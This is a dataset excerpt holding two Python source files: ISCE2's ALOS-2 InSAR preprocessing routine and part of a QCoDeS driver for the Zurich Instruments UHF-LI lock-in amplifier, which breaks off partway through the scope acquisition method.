max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
components/isceobj/Alos2Proc/runPreprocessor.py
|
yuankailiu/isce2
| 1,133 |
69320
|
#
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import glob
import logging
import datetime
import numpy as np
import isceobj
import isceobj.Sensor.MultiMode as MultiMode
from isceobj.Planet.Planet import Planet
from isceobj.Alos2Proc.Alos2ProcPublic import runCmd
from isceobj.Alos2Proc.Alos2ProcPublic import getBboxRdr
from isceobj.Alos2Proc.Alos2ProcPublic import getBboxGeo
from isceobj.Alos2Proc.Alos2ProcPublic import modeProcParDict
logger = logging.getLogger('isce.alos2insar.runPreprocessor')
def runPreprocessor(self):
'''Extract images.
'''
catalog = isceobj.Catalog.createCatalog(self._insar.procDoc.name)
#find files
#actually no need to use absolute path any longer, since we are able to find file from vrt now. 27-JAN-2020, CRL.
#denseoffset may still need absolute path when making links
self.referenceDir = os.path.abspath(self.referenceDir)
self.secondaryDir = os.path.abspath(self.secondaryDir)
ledFilesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'LED-ALOS2*-*-*')))
imgFilesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*-*-*'.format(self.referencePolarization.upper()))))
ledFilesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'LED-ALOS2*-*-*')))
imgFilesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*-*-*'.format(self.secondaryPolarization.upper()))))
firstFrameReference = ledFilesReference[0].split('-')[-3][-4:]
firstFrameSecondary = ledFilesSecondary[0].split('-')[-3][-4:]
firstFrameImagesReference = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper(), firstFrameReference))))
firstFrameImagesSecondary = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper(), firstFrameSecondary))))
#determin operation mode
referenceMode = os.path.basename(ledFilesReference[0]).split('-')[-1][0:3]
secondaryMode = os.path.basename(ledFilesSecondary[0]).split('-')[-1][0:3]
spotlightModes = ['SBS']
stripmapModes = ['UBS', 'UBD', 'HBS', 'HBD', 'HBQ', 'FBS', 'FBD', 'FBQ']
scansarNominalModes = ['WBS', 'WBD', 'WWS', 'WWD']
scansarWideModes = ['VBS', 'VBD']
scansarModes = ['WBS', 'WBD', 'WWS', 'WWD', 'VBS', 'VBD']
#usable combinations
if (referenceMode in spotlightModes) and (secondaryMode in spotlightModes):
self._insar.modeCombination = 0
elif (referenceMode in stripmapModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 1
elif (referenceMode in scansarNominalModes) and (secondaryMode in scansarNominalModes):
self._insar.modeCombination = 21
elif (referenceMode in scansarWideModes) and (secondaryMode in scansarWideModes):
self._insar.modeCombination = 22
elif (referenceMode in scansarNominalModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 31
elif (referenceMode in scansarWideModes) and (secondaryMode in stripmapModes):
self._insar.modeCombination = 32
else:
print('\n\nthis mode combination is not possible')
print('note that for ScanSAR-stripmap, ScanSAR must be reference\n\n')
raise Exception('mode combination not supported')
# pixel size from real data processing. azimuth pixel size may change a bit as
# the antenna points to a different swath and therefore uses a different PRF.
# MODE RANGE PIXEL SIZE (LOOKS) AZIMUTH PIXEL SIZE (LOOKS)
# -------------------------------------------------------------------
# SPT [SBS]
# 1.4304222392897463 (2) 0.9351804642158579 (4)
# SM1 [UBS,UBD]
# 1.4304222392897463 (2) 1.8291988125114438 (2)
# SM2 [HBS,HBD,HBQ]
# 2.8608444785794984 (2) 3.0672373839847196 (2)
# SM3 [FBS,FBD,FBQ]
# 4.291266717869248 (2) 3.2462615913656667 (4)
# WD1 [WBS,WBD] [WWS,WWD]
# 8.582533435738496 (1) 2.6053935830031887 (14)
# 8.582533435738496 (1) 2.092362043327227 (14)
# 8.582533435738496 (1) 2.8817632034495717 (14)
# 8.582533435738496 (1) 3.054362492601842 (14)
# 8.582533435738496 (1) 2.4582084463356977 (14)
# WD2 [VBS,VBD]
# 8.582533435738496 (1) 2.9215796012950728 (14)
# 8.582533435738496 (1) 3.088859074497863 (14)
# 8.582533435738496 (1) 2.8792293071133073 (14)
# 8.582533435738496 (1) 3.0592146044234854 (14)
# 8.582533435738496 (1) 2.8818767752199137 (14)
# 8.582533435738496 (1) 3.047038521027477 (14)
# 8.582533435738496 (1) 2.898816222039108 (14)
#determine default number of looks:
self._insar.numberRangeLooks1 = self.numberRangeLooks1
self._insar.numberAzimuthLooks1 = self.numberAzimuthLooks1
self._insar.numberRangeLooks2 = self.numberRangeLooks2
self._insar.numberAzimuthLooks2 = self.numberAzimuthLooks2
#the following two will be automatically determined by runRdrDemOffset.py
self._insar.numberRangeLooksSim = self.numberRangeLooksSim
self._insar.numberAzimuthLooksSim = self.numberAzimuthLooksSim
self._insar.numberRangeLooksIon = self.numberRangeLooksIon
self._insar.numberAzimuthLooksIon = self.numberAzimuthLooksIon
if self._insar.numberRangeLooks1 is None:
self._insar.numberRangeLooks1 = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks1']
if self._insar.numberAzimuthLooks1 is None:
self._insar.numberAzimuthLooks1 = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks1']
if self._insar.numberRangeLooks2 is None:
self._insar.numberRangeLooks2 = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooks2']
if self._insar.numberAzimuthLooks2 is None:
self._insar.numberAzimuthLooks2 = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooks2']
if self._insar.numberRangeLooksIon is None:
self._insar.numberRangeLooksIon = modeProcParDict['ALOS-2'][referenceMode]['numberRangeLooksIon']
if self._insar.numberAzimuthLooksIon is None:
self._insar.numberAzimuthLooksIon = modeProcParDict['ALOS-2'][referenceMode]['numberAzimuthLooksIon']
#define processing file names
self._insar.referenceDate = os.path.basename(ledFilesReference[0]).split('-')[2]
self._insar.secondaryDate = os.path.basename(ledFilesSecondary[0]).split('-')[2]
self._insar.setFilename(referenceDate=self._insar.referenceDate, secondaryDate=self._insar.secondaryDate, nrlks1=self._insar.numberRangeLooks1, nalks1=self._insar.numberAzimuthLooks1, nrlks2=self._insar.numberRangeLooks2, nalks2=self._insar.numberAzimuthLooks2)
#find frame numbers
if (self._insar.modeCombination == 31) or (self._insar.modeCombination == 32):
if (self.referenceFrames == None) or (self.secondaryFrames == None):
raise Exception('for ScanSAR-stripmap inteferometry, you must set reference and secondary frame numbers')
#if not set, find frames automatically
if self.referenceFrames == None:
self.referenceFrames = []
for led in ledFilesReference:
frameNumber = os.path.basename(led).split('-')[1][-4:]
if frameNumber not in self.referenceFrames:
self.referenceFrames.append(frameNumber)
if self.secondaryFrames == None:
self.secondaryFrames = []
for led in ledFilesSecondary:
frameNumber = os.path.basename(led).split('-')[1][-4:]
if frameNumber not in self.secondaryFrames:
self.secondaryFrames.append(frameNumber)
#sort frames
self.referenceFrames = sorted(self.referenceFrames)
self.secondaryFrames = sorted(self.secondaryFrames)
#check number of frames
if len(self.referenceFrames) != len(self.secondaryFrames):
raise Exception('number of frames in reference dir is not equal to number of frames \
in secondary dir. please set frame number manually')
#find swath numbers (if not ScanSAR-ScanSAR, compute valid swaths)
if (self._insar.modeCombination == 0) or (self._insar.modeCombination == 1):
self.startingSwath = 1
self.endingSwath = 1
if self._insar.modeCombination == 21:
if self.startingSwath == None:
self.startingSwath = 1
if self.endingSwath == None:
self.endingSwath = 5
if self._insar.modeCombination == 22:
if self.startingSwath == None:
self.startingSwath = 1
if self.endingSwath == None:
self.endingSwath = 7
#determine starting and ending swaths for ScanSAR-stripmap, user's settings are overwritten
#use first frame to check overlap
if (self._insar.modeCombination == 31) or (self._insar.modeCombination == 32):
if self._insar.modeCombination == 31:
numberOfSwaths = 5
else:
numberOfSwaths = 7
overlapSubswaths = []
for i in range(numberOfSwaths):
overlapRatio = check_overlap(ledFilesReference[0], firstFrameImagesReference[i], ledFilesSecondary[0], firstFrameImagesSecondary[0])
if overlapRatio > 1.0 / 4.0:
overlapSubswaths.append(i+1)
if overlapSubswaths == []:
raise Exception('There is no overlap area between the ScanSAR-stripmap pair')
self.startingSwath = int(overlapSubswaths[0])
self.endingSwath = int(overlapSubswaths[-1])
#save the valid frames and swaths for future processing
self._insar.referenceFrames = self.referenceFrames
self._insar.secondaryFrames = self.secondaryFrames
self._insar.startingSwath = self.startingSwath
self._insar.endingSwath = self.endingSwath
##################################################
#1. create directories and read data
##################################################
self.reference.configure()
self.secondary.configure()
self.reference.track.configure()
self.secondary.track.configure()
for i, (referenceFrame, secondaryFrame) in enumerate(zip(self._insar.referenceFrames, self._insar.secondaryFrames)):
#frame number starts with 1
frameDir = 'f{}_{}'.format(i+1, referenceFrame)
os.makedirs(frameDir, exist_ok=True)
os.chdir(frameDir)
#attach a frame to reference and secondary
frameObjReference = MultiMode.createFrame()
frameObjSecondary = MultiMode.createFrame()
frameObjReference.configure()
frameObjSecondary.configure()
self.reference.track.frames.append(frameObjReference)
self.secondary.track.frames.append(frameObjSecondary)
#swath number starts with 1
for j in range(self._insar.startingSwath, self._insar.endingSwath+1):
print('processing frame {} swath {}'.format(referenceFrame, j))
swathDir = 's{}'.format(j)
os.makedirs(swathDir, exist_ok=True)
os.chdir(swathDir)
#attach a swath to reference and secondary
swathObjReference = MultiMode.createSwath()
swathObjSecondary = MultiMode.createSwath()
swathObjReference.configure()
swathObjSecondary.configure()
self.reference.track.frames[-1].swaths.append(swathObjReference)
self.secondary.track.frames[-1].swaths.append(swathObjSecondary)
#setup reference
self.reference.leaderFile = sorted(glob.glob(os.path.join(self.referenceDir, 'LED-ALOS2*{}-*-*'.format(referenceFrame))))[0]
if referenceMode in scansarModes:
self.reference.imageFile = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.referencePolarization.upper(), referenceFrame, j))))[0]
else:
self.reference.imageFile = sorted(glob.glob(os.path.join(self.referenceDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper(), referenceFrame))))[0]
self.reference.outputFile = self._insar.referenceSlc
self.reference.useVirtualFile = self.useVirtualFile
#read reference
(imageFDR, imageData)=self.reference.readImage()
(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord)=self.reference.readLeader()
self.reference.setSwath(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.reference.setFrame(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.reference.setTrack(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
#setup secondary
self.secondary.leaderFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'LED-ALOS2*{}-*-*'.format(secondaryFrame))))[0]
if secondaryMode in scansarModes:
self.secondary.imageFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*-F{}'.format(self.secondaryPolarization.upper(), secondaryFrame, j))))[0]
else:
self.secondary.imageFile = sorted(glob.glob(os.path.join(self.secondaryDir, 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper(), secondaryFrame))))[0]
self.secondary.outputFile = self._insar.secondarySlc
self.secondary.useVirtualFile = self.useVirtualFile
#read secondary
(imageFDR, imageData)=self.secondary.readImage()
(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord)=self.secondary.readLeader()
self.secondary.setSwath(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.secondary.setFrame(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
self.secondary.setTrack(leaderFDR, sceneHeaderRecord, platformPositionRecord, facilityRecord, imageFDR, imageData)
os.chdir('../')
self._insar.saveProduct(self.reference.track.frames[-1], self._insar.referenceFrameParameter)
self._insar.saveProduct(self.secondary.track.frames[-1], self._insar.secondaryFrameParameter)
os.chdir('../')
self._insar.saveProduct(self.reference.track, self._insar.referenceTrackParameter)
self._insar.saveProduct(self.secondary.track, self._insar.secondaryTrackParameter)
catalog.printToLog(logger, "runPreprocessor")
self._insar.procDoc.addAllFromCatalog(catalog)
def check_overlap(ldr_m, img_m, ldr_s, img_s):
from isceobj.Constants import SPEED_OF_LIGHT
rangeSamplingRateReference, widthReference, nearRangeReference = read_param_for_checking_overlap(ldr_m, img_m)
rangeSamplingRateSecondary, widthSecondary, nearRangeSecondary = read_param_for_checking_overlap(ldr_s, img_s)
farRangeReference = nearRangeReference + (widthReference-1) * 0.5 * SPEED_OF_LIGHT / rangeSamplingRateReference
farRangeSecondary = nearRangeSecondary + (widthSecondary-1) * 0.5 * SPEED_OF_LIGHT / rangeSamplingRateSecondary
#This should be good enough, although precise image offsets are not used.
if farRangeReference <= nearRangeSecondary:
overlapRatio = 0.0
elif farRangeSecondary <= nearRangeReference:
overlapRatio = 0.0
else:
# 0 1 2 3
ranges = np.array([nearRangeReference, farRangeReference, nearRangeSecondary, farRangeSecondary])
rangesIndex = np.argsort(ranges)
overlapRatio = ranges[rangesIndex[2]]-ranges[rangesIndex[1]] / (farRangeReference-nearRangeReference)
return overlapRatio
def read_param_for_checking_overlap(leader_file, image_file):
from isceobj.Sensor import xmlPrefix
import isceobj.Sensor.CEOS as CEOS
#read from leader file
fsampConst = { 104: 1.047915957140240E+08,
52: 5.239579785701190E+07,
34: 3.493053190467460E+07,
17: 1.746526595233730E+07 }
fp = open(leader_file,'rb')
leaderFDR = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/leader_file.xml'),dataFile=fp)
leaderFDR.parse()
fp.seek(leaderFDR.getEndOfRecordPosition())
sceneHeaderRecord = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/scene_record.xml'),dataFile=fp)
sceneHeaderRecord.parse()
fp.seek(sceneHeaderRecord.getEndOfRecordPosition())
fsamplookup = int(sceneHeaderRecord.metadata['Range sampling rate in MHz'])
rangeSamplingRate = fsampConst[fsamplookup]
fp.close()
#print('{}'.format(rangeSamplingRate))
#read from image file
fp = open(image_file, 'rb')
imageFDR = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/image_file.xml'), dataFile=fp)
imageFDR.parse()
fp.seek(imageFDR.getEndOfRecordPosition())
imageData = CEOS.CEOSDB(xml=os.path.join(xmlPrefix,'alos2_slc/image_record.xml'), dataFile=fp)
imageData.parseFast()
width = imageFDR.metadata['Number of pixels per line per SAR channel']
near_range = imageData.metadata['Slant range to 1st data sample']
fp.close()
#print('{}'.format(width))
#print('{}'.format(near_range))
return (rangeSamplingRate, width, near_range)
|
qcodes/instrument_drivers/ZI/ZIUHFLI.py
|
riju-pal/QCoDeS_riju
| 223 |
69344
|
<reponame>riju-pal/QCoDeS_riju
import logging
import math
import time
from functools import partial
from math import sqrt
from typing import Any, Callable, Dict, List, Optional, Sequence, Union, cast
import numpy as np
from qcodes.utils.helpers import create_on_off_val_mapping
try:
import zhinst.utils
except ImportError:
raise ImportError('''Could not find Zurich Instruments Lab One software.
Please refer to the Zi UHF-LI User Manual for
download and installation instructions.
''')
from qcodes.instrument.base import Instrument
from qcodes.instrument.channel import ChannelList, InstrumentChannel
from qcodes.instrument.parameter import MultiParameter
from qcodes.utils import validators as vals
from qcodes.utils.deprecate import deprecate
log = logging.getLogger(__name__)
class AUXOutputChannel(InstrumentChannel):
def __init__(self, parent: 'ZIUHFLI', name: str, channum: int) -> None:
super().__init__(parent, name)
# TODO better validations of parameters
self.add_parameter('scale',
label='scale',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'scale'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'scale'),
vals=vals.Numbers()
)
self.add_parameter('preoffset',
label='preoffset',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'preoffset'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'preoffset'),
vals=vals.Numbers()
)
self.add_parameter('offset',
label='offset',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'offset'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'offset'),
vals=vals.Numbers()
)
self.add_parameter('limitlower',
label='Lower limit',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'limitlower'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'limitlower'),
vals=vals.Numbers()
)
self.add_parameter('limitupper',
label='Upper limit',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 1, 'limitupper'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 1, 'limitupper'),
vals=vals.Numbers()
)
# TODO the validator does not catch that there are only
# 2 valid output channels for AU types
self.add_parameter('channel',
label='Channel',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 0, 'demodselect'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 0, 'demodselect'),
get_parser=lambda x: x+1,
set_parser=lambda x: x-1,
vals=vals.Ints(0,7)
)
outputvalmapping = {'Demod X': 0,
'Demod Y': 1,
'Demod R': 2,
'Demod THETA': 3,
'AU Cartesian': 7,
'AU Polar': 8}
self.add_parameter('output',
label='Output',
unit='',
get_cmd=partial(self._parent._getter, 'auxouts',
channum - 1, 0, 'outputselect'),
set_cmd=partial(self._parent._setter, 'auxouts',
channum - 1, 0, 'outputselect'),
val_mapping=outputvalmapping
)
class Sweep(MultiParameter):
"""
Parameter class for the ZIUHFLI instrument class for the sweeper.
The get method returns a tuple of arrays, where each array contains the
values of a signal added to the sweep (e.g. demodulator 4 phase).
Attributes:
names (tuple): Tuple of strings containing the names of the sweep
signals (to be measured)
units (tuple): Tuple of strings containg the units of the signals
shapes (tuple): Tuple of tuples each containing the Length of a
signal.
setpoints (tuple): Tuple of N copies of the sweep x-axis points,
where N is he number of measured signals
setpoint_names (tuple): Tuple of N identical strings with the name
of the sweep x-axis.
"""
def __init__(self, name, instrument, **kwargs):
# The __init__ requires that we supply names and shapes,
# but there is no way to know what they could be known at this time.
# They are updated via build_sweep.
super().__init__(
name, names=("",), shapes=((1,),), instrument=instrument, **kwargs
)
def build_sweep(self):
"""
Build a sweep with the current sweep settings. Must be called
before the sweep can be executed.
For developers:
This is a general function for updating the sweeper.
Every time a parameter of the sweeper is changed, this function
must be called to update the sweeper. Although such behaviour is only
strictly necessary for parameters that affect the setpoints of the
Sweep parameter, having to call this function for any parameter is
deemed more user friendly (easier to remember; when? -always).
The function sets all (user specified) settings on the sweeper and
additionally sets names, units, and setpoints for the Sweep
parameter.
"""
signals = self.instrument._sweeper_signals
sweepdict = self.instrument._sweepdict
log.info('Built a sweep')
sigunits = {'X': 'V', 'Y': 'V', 'R': 'Vrms', 'Xrms': 'Vrms',
'Yrms': 'Vrms', 'Rrms': 'Vrms', 'phase': 'degrees'}
names = []
units = []
for sig in signals:
name = sig.split('/')[-1]
names.append(name)
units.append(sigunits[name])
self.names = tuple(names)
self.units = tuple(units)
self.labels = tuple(names) # TODO: What are good labels?
# TODO: what are good set point names?
spnamedict = {'auxouts/0/offset': 'Volts',
'auxouts/1/offset': 'Volts',
'auxouts/2/offset': 'Volts',
'auxouts/3/offset': 'Volts',
'demods/0/phaseshift': 'degrees',
'demods/1/phaseshift': 'degrees',
'demods/2/phaseshift': 'degrees',
'demods/3/phaseshift': 'degrees',
'demods/4/phaseshift': 'degrees',
'demods/5/phaseshift': 'degrees',
'demods/6/phaseshift': 'degrees',
'demods/7/phaseshift': 'degrees',
'oscs/0/freq': 'Hz',
'oscs/1/freq': 'Hz',
'sigouts/0/amplitudes/3': 'Volts',
'sigouts/0/offset': 'Volts',
'sigouts/1/amplitudes/7': 'Volts',
'sigouts/1/offset': 'Volts'
}
sp_name = spnamedict[sweepdict['gridnode']]
self.setpoint_names = ((sp_name,),)*len(signals)
start = sweepdict['start']
stop = sweepdict['stop']
npts = sweepdict['samplecount']
# TODO: make sure that these setpoints are correct, i.e. actually
# matching what the UHFLI does
# TODO: support non-sequential sweep mode
if not sweepdict['scan'] == 0:
raise NotImplementedError('Only sequential scanning is supported.')
if sweepdict['xmapping'] == 0:
sw = tuple(np.linspace(start, stop, npts))
else:
logstart = np.log10(start)
logstop = np.log10(stop)
sw = tuple(np.logspace(logstart, logstop, npts))
self.setpoints = ((sw,),)*len(signals)
self.shapes = ((npts,),)*len(signals)
# Now actually send the settings to the instrument
for (setting, value) in sweepdict.items():
setting = 'sweep/' + setting
self.instrument.sweeper.set(setting, value)
self.instrument.sweep_correctly_built = True
def get_raw(self):
"""
Execute the sweeper and return the data corresponding to the
subscribed signals.
Returns:
tuple: Tuple containg N numpy arrays where N is the number
of signals added to the sweep.
Raises:
ValueError: If no signals have been added to the sweep
ValueError: If a sweep setting has been modified since
the last sweep, but Sweep.build_sweep has not been run
"""
daq = self.instrument.daq
signals = self.instrument._sweeper_signals
sweeper = self.instrument.sweeper
if signals == []:
raise ValueError('No signals selected! Can not perform sweep.')
if self.instrument.sweep_correctly_built is False:
raise ValueError('The sweep has not been correctly built.' +
' Please run Sweep.build_sweep.')
# We must enable the demodulators we use.
# After the sweep, they should be returned to their original state
streamsettings = [] # This list keeps track of the pre-sweep settings
for sigstr in signals:
path = '/'.join(sigstr.split('/')[:-1])
(_, dev, _, dmnum, _) = path.split('/')
# If the setting has never changed, get returns an empty dict.
# In that case, we assume that it's zero (factory default)
try:
toget = path.replace('sample', 'enable')
# ZI like nesting inside dicts...
setting = daq.get(toget)[dev]['demods'][dmnum]['enable']['value'][0]
except KeyError:
setting = 0
streamsettings.append(setting)
daq.setInt(path.replace('sample', 'enable'), 1)
# We potentially subscribe several times to the same demodulator,
# but that should not be a problem
sweeper.subscribe(path)
sweeper.execute()
timeout = self.instrument.sweeper_timeout.get()
start = time.time()
while not sweeper.finished(): # Wait until the sweep is done/timeout
time.sleep(0.2) # Check every 200 ms whether the sweep is done
# Here we could read intermediate data via:
# data = sweeper.read(True)...
# and process it while the sweep is completing.
if (time.time() - start) > timeout:
# If for some reason the sweep is blocking, force the end of the
# measurement.
log.error("Sweep still not finished, forcing finish...")
# should exit function with error message instead of returning
sweeper.finish()
return_flat_dict = True
data = sweeper.read(return_flat_dict)
sweeper.unsubscribe('*')
for (state, sigstr) in zip(streamsettings, signals):
path = '/'.join(sigstr.split('/')[:-1])
daq.setInt(path.replace('sample', 'enable'), int(state))
return self._parsesweepdata(data)
def _parsesweepdata(self, sweepresult):
"""
Parse the raw result of a sweep into just the data asked for by the
added sweeper signals. Used by Sweep.get.
Args:
sweepresult (dict): The dict returned by sweeper.read
Returns:
tuple: The requested signals in a tuple
"""
trans = {'X': 'x', 'Y': 'y', 'Aux Input 1': 'auxin0',
'Aux Input 2': 'auxin1', 'R': 'r', 'phase': 'phase',
'Xrms': 'xpwr', 'Yrms': 'ypwr', 'Rrms': 'rpwr'}
returndata = []
for signal in self.instrument._sweeper_signals:
path = '/'.join(signal.split('/')[:-1])
attr = signal.split('/')[-1]
data = sweepresult[path][0][0][trans[attr]]
returndata.append(data)
return tuple(returndata)
class Scope(MultiParameter):
"""
Parameter class for the ZI UHF-LI Scope Channel 1
The .get method launches an acquisition and returns a tuple of two
np.arrays
FFT mode is NOT supported.
Attributes:
names (tuple): Tuple of strings containing the names of the sweep
signals (to be measured)
units (tuple): Tuple of strings containg the units of the signals
shapes (tuple): Tuple of tuples each containing the Length of a
signal.
setpoints (tuple): Tuple of N copies of the sweep x-axis points,
where N is he number of measured signals
setpoint_names (tuple): Tuple of N identical strings with the name
of the sweep x-axis.
"""
def __init__(self, name, instrument, **kwargs):
# The __init__ requires that we supply names and shapes,
# but there is no way to know what they could be known at this time.
# They are updated via build_scope.
super().__init__(
name, names=("",), shapes=((1,),), instrument=instrument, **kwargs
)
self._scopeactions = [] # list of callables
def add_post_trigger_action(self, action: Callable[..., Any]) -> None:
"""
Add an action to be performed immediately after the trigger
has been armed. The action must be a callable taking zero
arguments
"""
if action not in self._scopeactions:
self._scopeactions.append(action)
@property
def post_trigger_actions(self) -> List[Callable[..., Any]]:
return self._scopeactions
def prepare_scope(self):
"""
Prepare the scope for a measurement. Must immediately preceed a
measurement.
"""
log.info('Preparing the scope')
# A convenient reference
params = self.instrument.parameters
# First figure out what the user has asked for
chans = {1: (True, False), 2: (False, True), 3: (True, True)}
channels = chans[params['scope_channels'].get()]
npts = params['scope_length'].get()
# Find out whether segments are enabled
if params['scope_segments'].get() == 'ON':
segs = params['scope_segments_count'].get()
else:
segs = 1
inputunits = {'Signal Input 1': 'V',
'Signal Input 2': 'V',
'Trig Input 1': 'V',
'Trig Input 2': 'V',
'Aux Output 1': 'V',
'Aux Output 2': 'V',
'Aux Output 3': 'V',
'Aux Output 4': 'V',
'Aux In 1 Ch 1': 'V',
'Aux In 1 Ch 2': 'V',
'Osc phi Demod 4': '°',
'osc phi Demod 8': '°',
'AU Cartesian 1': 'arb. un.',
'AU Cartesian 2': 'arb. un',
'AU Polar 1': 'arb. un.',
'AU Polar 2': 'arb. un.',
'Demod 1 X': 'V',
'Demod 1 Y': 'V',
'Demod 1 R': 'V',
'Demod 1 Phase': '°',
'Demod 2 X': 'V',
'Demod 2 Y': 'V',
'Demod 2 R': 'V',
'Demod 2 Phase': '°',
'Demod 3 X': 'V',
'Demod 3 Y': 'V',
'Demod 3 R': 'V',
'Demod 3 Phase': '°',
'Demod 4 X': 'V',
'Demod 4 Y': 'V',
'Demod 4 R': 'V',
'Demod 4 Phase': '°',
'Demod 5 X': 'V',
'Demod 5 Y': 'V',
'Demod 5 R': 'V',
'Demod 5 Phase': '°',
'Demod 6 X': 'V',
'Demod 6 Y': 'V',
'Demod 6 R': 'V',
'Demod 6 Phase': '°',
'Demod 7 X': 'V',
'Demod 7 Y': 'V',
'Demod 7 R': 'V',
'Demod 7 Phase': '°',
'Demod 8 X': 'V',
'Demod 8 Y': 'V',
'Demod 8 R': 'V',
'Demod 8 Phase': '°',
}
#TODO: what are good names?
inputnames = {'Signal Input 1': 'Sig. In 1',
'Signal Input 2': 'Sig. In 2',
'Trig Input 1': 'Trig. In 1',
'Trig Input 2': 'Trig. In 2',
'Aux Output 1': 'Aux. Out 1',
'Aux Output 2': 'Aux. Out 2',
'Aux Output 3': 'Aux. Out 3',
'Aux Output 4': 'Aux. Out 4',
'Aux In 1 Ch 1': 'Aux. In 1 Ch 1',
'Aux In 1 Ch 2': 'Aux. In 1 Ch 2',
'Osc phi Demod 4': 'Demod. 4 Phase',
'osc phi Demod 8': 'Demod. 8 Phase',
'AU Cartesian 1': 'AU Cartesian 1',
'AU Cartesian 2': 'AU Cartesian 2',
'AU Polar 1': 'AU Polar 1',
'AU Polar 2': 'AU Polar 2',
'Demod 1 X': 'Demodulator 1 X',
'Demod 1 Y': 'Demodulator 1 Y',
'Demod 1 R': 'Demodulator 1 R',
'Demod 1 Phase': 'Demodulator 1 Phase',
'Demod 2 X': 'Demodulator 2 X',
'Demod 2 Y': 'Demodulator 2 Y',
'Demod 2 R': 'Demodulator 2 R',
'Demod 2 Phase': 'Demodulator 2 Phase',
'Demod 3 X': 'Demodulator 3 X',
'Demod 3 Y': 'Demodulator 3 Y',
'Demod 3 R': 'Demodulator 3 R',
'Demod 3 Phase': 'Demodulator 3 Phase',
'Demod 4 X': 'Demodulator 4 X',
'Demod 4 Y': 'Demodulator 4 Y',
'Demod 4 R': 'Demodulator 4 R',
'Demod 4 Phase': 'Demodulator 4 Phase',
'Demod 5 X': 'Demodulator 5 X',
'Demod 5 Y': 'Demodulator 5 Y',
'Demod 5 R': 'Demodulator 5 R',
'Demod 5 Phase': 'Demodulator 5 Phase',
'Demod 6 X': 'Demodulator 6 X',
'Demod 6 Y': 'Demodulator 6 Y',
'Demod 6 R': 'Demodulator 6 R',
'Demod 6 Phase': 'Demodulator 6 Phase',
'Demod 7 X': 'Demodulator 7 X',
'Demod 7 Y': 'Demodulator 7 Y',
'Demod 7 R': 'Demodulator 7 R',
'Demod 7 Phase': 'Demodulator 7 Phase',
'Demod 8 X': 'Demodulator 8 X',
'Demod 8 Y': 'Demodulator 8 Y',
'Demod 8 R': 'Demodulator 8 R',
'Demod 8 Phase': 'Demodulator 8 Phase',
}
# Make the basic setpoints (the x-axis)
duration = params['scope_duration'].get()
delay = params['scope_trig_delay'].get()
starttime = params['scope_trig_reference'].get()*0.01*duration + delay
stoptime = starttime + duration
setpointlist = tuple(np.linspace(starttime, stoptime, npts)) # x-axis
spname = 'Time'
namestr = f"scope_channel{1}_input"
name1 = inputnames[params[namestr].get()]
unit1 = inputunits[params[namestr].get()]
namestr = f"scope_channel{2}_input"
name2 = inputnames[params[namestr].get()]
unit2 = inputunits[params[namestr].get()]
self.setpoints = ((tuple(range(segs)), (setpointlist,)*segs),)*2
#self.setpoints = ((setpointlist,)*segs,)*2
self.setpoint_names = (('Segments', 'Time'), ('Segments', 'Time'))
self.names = (name1, name2)
self.units = (unit1, unit2)
self.labels = ('Scope channel 1', 'Scope channel 2')
self.shapes = ((segs, npts), (segs, npts))
self.instrument.daq.sync()
self.instrument.scope_correctly_built = True
def get_raw(self):
"""
Acquire data from the scope.
Returns:
tuple: Tuple of two n X m arrays where n is the number of segments
and m is the number of points in the scope trace.
Raises:
ValueError: If the scope has not been prepared by running the
prepare_scope function.
"""
t_start = time.monotonic()
log.info('Scope get method called')
if not self.instrument.scope_correctly_built:
